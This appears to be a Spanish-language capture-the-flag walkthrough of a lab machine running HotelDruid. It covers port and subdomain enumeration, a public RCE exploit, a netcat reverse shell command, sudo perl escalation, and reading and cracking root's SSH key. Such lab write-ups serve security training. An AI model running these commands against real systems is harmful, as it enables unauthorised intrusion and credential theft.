Comenzamos con un escaneo general y uno específico de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.133❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.133
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-25 01:04 -03
Nmap scan report for 192.168.1.133
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f0e624fb9eb07a1abdf7b185237fb16f (RSA)
| 256 99c87431451058b0cecc63b47a82573d (ECDSA)
|_ 256 60da3e3138fab549ab48c3432c9fd132 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Hotel
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.84 secondsEnumeramos directorios con gobuster:
❯ gobuster dir -u http://192.168.1.133 -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt -r
...
/index.html (Status: 200) [Size: 33065]
/contact.html (Status: 200) [Size: 13698]
/about.html (Status: 200) [Size: 17025]
/events.html (Status: 200) [Size: 12372]
/rooms.html (Status: 200) [Size: 15616]
/reservation.html (Status: 200) [Size: 15792]
...Con whatweb identificamos un dominio asociado:
❯ whatweb http://192.168.1.133
http://192.168.1.133 [200 OK] Apache[2.4.56], Bootstrap, Country[RESERVED][ZZ], Email[info@hotel.nyx], HTML5, HTTPServer[Debian Linux][Apache/2.4.56 (Debian)], IP[192.168.1.133], JQuery[3.3.1], Script, Title[Hotel], X-UA-Compatible[IE=edge]Agregamos hotel.nyx al /etc/hosts y fuzzeamos subdominios, descubriendo reservations:
❯ ffuf -u http://hotel.nyx -H "Host: FUZZ.hotel.nyx" -w ~/Documentos/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fs 33064
...
reservations [Status: 200, Size: 398, Words: 25, Lines: 18]
...Agregamos el nuevo subdominio al /etc/hosts y accedemos. El sitio ejecuta HotelDruid, vulnerable a RCE. Usamos el exploit (EDB-ID 50754), que añade una habitación maliciosa y deja un endpoint para ejecutar comandos:
❯ python3 50754.py -t http://reservations.hotel.nyx --noauth
/$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/
Exploit By - 0z09e (https://twitter.com/0z09e)
[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://reservations.hotel.nyx/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)Accedemos al endpoint con una reverse shell en el parámetro cmd:
http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=nc -e /bin/bash 192.168.1.10 1234Obtenemos la sesión como www-data. Para escalar privilegios, revisamos los permisos sudo:
www-data@druid:/var/www/hoteldruid/dati$ sudo -l
sudo -l
Matching Defaults entries for www-data on druid:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on druid:
(sun) NOPASSWD: /usr/bin/perlPodemos ejecutar perl como sun, lo que aprovechamos para obtener una shell de ese usuario:
www-data@druid:/home$ sudo -u sun perl -e 'exec "/bin/sh";'
$ whoami
sunObtenemos la primera flag y comenzamos la segunda escalada. Buscando binarios SUID, encontramos uno llamado super, que permite ejecutar un comando secret con uid=0 y gid=0. El comando secret actúa como un cat que invierte el contenido que lista. Con esa lectura privilegiada, leemos la clave id_rsa de root (invirtiéndola con rev):
sun@druid:~$ super secret /root/.ssh/id_rsa | revCrackeamos la passphrase de la clave con john:
❯ ssh2john root_id_rsa > hash
❯ john -w:/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
super1 (root_id_rsa)
...Y nos conectamos como root:
❯ ssh root@192.168.1.19 -i root_id_rsa
Enter passphrase for key 'root_id_rsa':
root@druid:~#Obtenemos nuestra flag y fin.